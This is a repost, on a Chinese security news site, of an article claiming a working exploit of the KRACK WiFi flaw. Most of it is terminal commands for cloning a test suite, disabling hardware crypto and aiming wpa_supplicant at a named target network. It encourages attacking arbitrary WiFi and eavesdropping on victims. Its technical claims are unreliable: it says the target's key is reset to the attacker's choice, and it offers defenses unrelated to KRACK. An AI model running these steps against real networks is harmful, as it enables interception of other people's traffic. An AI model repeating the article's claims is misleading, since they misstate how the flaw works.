黑基网 首页 资讯 安全圈 查看内容

国内研究人员首次Wifi重大漏洞利用实现

2017-11-14 00:43| 投稿: lofor |来自: 互联网

摘要: 弹出连接提示弹窗后,输入任意密码位数均可,尝试连接,目标wifi会被攻击,创造握手,目标wifi密钥会被重置成你设定的密钥,在iphone上可以看到有人不断连接和断开,这时候就是连接成功,可以开始监听,利用中间人技 ...

弹出连接提示弹窗后,输入任意密码位数均可,尝试连接,目标wifi会被攻击,创造握手,目标wifi密钥会被重置成你设定的密钥,在iphone上可以看到有人不断连接和断开,这时候就是连接成功,可以开始监听,利用中间人技术,这里以iphone手机做测试。Krack曝出来很久了,所以在11.3号写下这篇文章,思来想去就发表在freebuf这吧。

从事件开始到现在也一直没有攻击的套件和利用文章,按步骤操作,过程很简单,研究人员都可以看懂,不提倡恶意攻击者使用,所以就不写傻瓜tou式教程lan,在绝大用户都没更新的时候,还是希望这篇文章只是作为研究使用(漏洞没有那么大的伤害性)

打开终端:

apt-get update
apt-get install libnl-3-dev libnl-genl-3-dev pkg-config libssl-dev net-tools git sysfsutils python-scapy python-pycryptodome

下载文件:

git clone https://github.com/NoahhhRyan/krackattacks-test

cd krackattacks-test-research  cd krackattacks

chmod 777 krack-ft-test.py

chmod 777 disable-hwcrypto.sh

./disable-hwcrypto.sh

python krack-ft-test.py

设置network.conf文件,在目录里需要将里面的”testnet”改成你要攻击的wifi名,密码随意,保存在套件目录下:

最后执行如下命令,并尝试连接目标开始攻击,等待结果。

sudo wpa_supplicant -D nl80211 -i wlan0 -c network.conf




然后也可以对任意wifi进行攻击,在wifi列表点击连接即可,在苹果手机上的热点栏能看到攻击者不断连接和断开,这里我们再测试了一个wifi,效果同样可以。

防御方法

总结一下,提供一个暂时的解决办法,更改路由器默认用户名,密码和SSID,打开防火墙,关闭SSID广播,为自己的用户设置单独的SSID,完全关闭DHCP。

危害性

其实不用那么担心,咱们大天朝wifi万能钥匙都存在多少年了,比它牛逼多了,也没见你们害怕啊。。

Thanks for all.
[email protected]

*本文作者:NoahhhRyan,转载请注明来自FreeBuf.COM

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论


新出炉

返回顶部